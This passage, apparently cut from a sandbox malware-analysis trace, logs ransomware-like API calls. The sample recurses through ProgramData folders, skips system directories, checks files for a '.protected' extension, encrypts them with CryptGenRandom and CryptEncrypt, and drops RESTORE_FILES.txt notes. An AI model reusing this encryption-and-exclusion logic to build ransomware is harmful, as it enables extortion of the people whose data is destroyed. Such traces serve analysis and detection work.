lpString2="RESTORE_FILES.txt") returned 1 [0093.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.156] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0093.156] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 99 [0093.156] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0093.156] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0093.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.157] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.157] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.157] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt") returned 107 [0093.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.157] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.157] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.158] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt") returned 68 [0093.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.158] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.158] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.158] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\RESTORE_FILES.txt") returned 63 [0093.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.159] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="Windows") returned -1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files") returned -1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files (x86)") returned -1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="$Recycle.bin") returned 1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="System Volume Information") returned -1 [0093.159] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned 43 [0093.159] lstrcmpW (lpString1="DeviceSync", lpString2=".") returned 1 [0093.159] lstrcmpW (lpString1="DeviceSync", lpString2="..") returned 1 [0093.159] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*") returned 45 [0093.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*", lpFindFileData=0x295ef20 | out: 
lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.159] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.159] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.159] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.159] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.159] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.159] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\.") returned 45 [0093.160] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.160] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.160] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.160] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.160] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.160] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\..") returned 46 [0093.160] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.160] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", 
lpString2="System Volume Information") returned -1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\RESTORE_FILES.txt") returned 61 [0093.160] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.160] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.160] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\RESTORE_FILES.txt") returned 61 [0093.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.160] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="Windows") returned -1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="Program Files") returned -1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="Program Files (x86)") returned -1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="$Recycle.bin") returned 1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="System Volume Information") returned -1 [0093.160] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned 36 [0093.160] lstrcmpW (lpString1="DRM", lpString2=".") returned 1 [0093.160] lstrcmpW (lpString1="DRM", lpString2="..") returned 1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*") returned 38 [0093.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.161] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.161] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.161] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\.") returned 38 [0093.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.161] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.161] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.161] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.161] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\..") returned 39 [0093.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.161] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.161] lstrcmpiW 
(lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\RESTORE_FILES.txt") returned 54 [0093.161] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.161] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.161] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="Program Files") returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="Program Files (x86)") returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned 43 [0093.161] lstrcmpW (lpString1="Server", lpString2=".") returned 1 [0093.161] lstrcmpW (lpString1="Server", lpString2="..") returned 1 [0093.162] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*") returned 45 [0093.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.162] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.162] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.162] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0093.162] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.162] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.162] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\.") returned 45 [0093.162] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.162] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.162] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.162] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\." (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.162] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.163] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.163] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.163] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.163] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.163] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\..") returned 46 [0093.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.163] 
StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.163] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.163] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.163] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\.." (normalized: "c:\\users\\all users\\microsoft\\drm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.163] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt") returned 61 [0093.163] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.163] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.163] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.163] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt") returned 61 [0093.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.163] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.164] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.164] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\RESTORE_FILES.txt") returned 54 [0093.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.164] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="Windows") returned -1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="Program Files") returned -1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="Program Files (x86)") returned -1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="$Recycle.bin") returned 1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="System Volume Information") returned -1 [0093.164] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome") returned 38 [0093.165] lstrcmpW (lpString1="eHome", lpString2=".") returned 1 [0093.165] lstrcmpW (lpString1="eHome", lpString2="..") returned 1 [0093.165] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*") returned 40 [0093.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.165] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.165] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.165] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.165] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.165] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.165] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\.") returned 40 [0093.165] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.165] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.165] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.165] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.165] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.165] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.165] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.165] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\..") returned 41 [0093.165] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.165] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.165] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.165] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0093.165] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0093.165] lstrcmpiW 
(lpString1="logs", lpString2="Program Files (x86)") returned -1 [0093.166] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0093.166] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0093.166] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned 43 [0093.166] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0093.166] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0093.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*") returned 45 [0093.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.166] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.166] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.166] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.166] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.166] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\.") returned 45 [0093.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.166] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.166] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.166] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.167] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.167] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.167] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.167] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\..") returned 46 [0093.167] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.167] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.167] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.167] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt") returned 61 [0093.167] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.167] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.167] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.167] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.167] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt") returned 61 [0093.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.167] FindNextFileW (in: 
